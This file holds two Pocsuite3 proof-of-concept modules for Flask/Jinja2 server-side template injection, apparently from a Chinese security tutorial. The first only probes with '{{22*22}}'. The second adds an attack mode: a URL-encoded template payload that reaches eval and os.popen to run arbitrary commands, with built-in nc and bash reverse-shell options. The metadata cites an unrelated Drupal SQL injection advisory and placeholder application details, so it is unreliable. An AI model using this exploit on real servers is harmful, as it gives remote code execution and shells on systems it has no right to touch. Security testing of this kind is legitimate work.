验证部分:
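# Pocsuite3 API helpers: Output builds the result object, register_poc
# registers the PoC class, requests is pocsuite's wrapped HTTP client.
from pocsuite3.api import Output, register_poc, requests, POCBase


class DemoPOC(POCBase):
    """Verify-only PoC: probes a reflected query parameter for Jinja2 template evaluation.

    The check is non-destructive — it asks the target to render the arithmetic
    expression ``{{22*22}}`` and looks for ``484`` in the response body.
    """

    vulID = '1571'  # ssvid ID; use 0 when the PoC is submitted together with the vulnerability
    version = "1"  # PoC version
    author = "tedu"  # author name
    vulDate = '2020-10-16'  # vulnerability disclosure date
    createDate = '2020-10-16'  # PoC creation date
    updateDate = '2020-10-16'  # PoC last-update date
    # NOTE(review): this reference describes a Drupal SQL injection, which is
    # unrelated to a Flask/Jinja2 SSTI — it looks like a template leftover.
    references = [
        'https://www.sektioneins.de/en/blog/14-10-15-drupal-sql-injection-vulnerability.html']  # source of the vulnerability report; leave empty for a 0day
    name = 'Flask Jinjia2 模板注入漏洞'  # PoC name
    # NOTE(review): appPowerLink/appName/appVersion still hold template
    # placeholder values ('example', '7.x'); fill in the real application.
    appPowerLink = 'https://www.example.org'  # vendor homepage
    appName = 'example'  # affected application
    appVersion = '7.x'  # affected versions
    vulType = 'SSTI Injection'  # vulnerability type
    desc = """
    在接收用户输入时,没有对{{}}这样的模板语法做过滤,导致{{}}中可以填写执行的程序。
    """  # short description of the vulnerability
    samples = []  # hosts the PoC has been confirmed against
    install_requires = []

    def _verify(self):
        """Verify mode (``--verify``).

        Sends ``{{22*22}}`` in the ``name`` query parameter and treats a 200
        response containing ``484`` as evidence that the parameter is rendered
        as a Jinja2 template.

        Returns:
            Output: success with URL/payload details when the marker is seen,
            fail otherwise.
        """
        result = {}
        path = "/?name="
        url = self.url + path
        payload = '{{22*22}}'
        try:
            # The leftover debug print of the full response body was removed:
            # it spammed stdout on every scan and is not part of the result.
            resq = requests.get(url + payload)
            # Substring match on '484' is a weak signal: a page that happens to
            # contain that number elsewhere would also be flagged as vulnerable.
            if resq and resq.status_code == 200 and '484' in resq.text:
                result['VerifyInfo'] = {
                    'URL': url,
                    'Name': payload,
                }
        except Exception:
            # Best-effort probe: any transport error leaves result empty and is
            # reported as "not vulnerable" by parse_output.
            pass
        return self.parse_output(result)

    def parse_output(self, result):
        """Wrap *result* in a pocsuite Output: success when non-empty, fail otherwise."""
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('target is not vulnerable.')
        return output


# Register the PoC with pocsuite3.
register_poc(DemoPOC)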
验证+攻击
from pocsuite3.api import Output, register_poc, requests, POCBase, REVERSE_PAYLOAD, OptDict from collections import OrderedDict class DemoPOC(POCBase): vulID = '1571' # ssvid ID, 如果是提交漏洞的同时提交PoC,则写出0 version = "1" # 版本 author = "tedu" # 作者名称 vulDate = '2020-10-16' # 漏洞公开时间 createDate = '2020-10-16' # 编写POC时间 updateDate = '2020-10-16' # 更新POC时间 references = [ 'https://www.sektioneins.de/en/blog/14-10-15-drupal-sql-injection-vulnerability.html'] # 漏洞地址来源,0day不用写 name = 'Flask Jinjia2 模板注入漏洞' # POC名称 appPowerLink = 'https://www.example.org' # 漏洞厂商的主页地址 appName = 'example' # 漏洞应用名称 appVersion = '7.x' # 漏洞影响版本 vulType = 'SSTI Injection' # 漏洞类型 desc = """ 在接收用户输入时,没有对{{}}这样的模板语法做过滤,导致{{}}中可以填写执行的程序。 """ # 漏洞简要描述 samples = [] # 测试样例,使用POC测试成功的网站 install_requires = [] def _verify(self): """verify mode""" result = {} path = "/?name=" url = self.url + path payload = "{{22*22}}" try: resq = requests.get(url + payload) if resq and resq.status_code == 200 and "484" in resq.text: result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = url result['VerifyInfo']['NAME'] = payload except Exception as e: pass return self.parse_output(result) # 定义其他选项参数 def _options(self): # 字典排序 o = OrderedDict() payload = { "nc": REVERSE_PAYLOAD.NC, "bash": REVERSE_PAYLOAD.BASH, } # 设置默认值 o["command"] = OptDict(selected="bash", default=payload) return o def _attack(self): result = {} path = "?name=" url = self.url + path # print(url) cmd = self.get_option("command") #攻击载荷 name对应的值就是攻击载荷 payload = "name=%7B%25%20for%20c%20in%20().__class__.__bases__%5B0%5D.__subclasses__()%20%25%7D%0A%20%20%20%20%7B%25%20if%20c.__name__%20==%20'WarningMessage'%20%25%7D%0A%20%20%20%20%20%20%20%20%7B%7B%20c.__init__.__globals__%5B'__builtins__'%5D%5B'eval'%5D('__import__(%22os%22).popen(%22"+cmd+"%22).read()')%20%7D%7D%0A%20%20%20%20%7B%25%20endif%20%25%7D%0A%7B%25%20endfor%20%25%7D" # print(payload) try: resq = requests.get(url + payload) t = resq.text t = t.replace('\n', '').replace('\r', '') print(t) t = t.replace(" 
", "") result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = url result['VerifyInfo']['Name'] = payload except Exception as e: return return self.parse_output(result) def parse_output(self, result): output = Output(self) if result: output.success(result) else: output.fail("target is not vulnerable") return output register_poc(DemoPOC)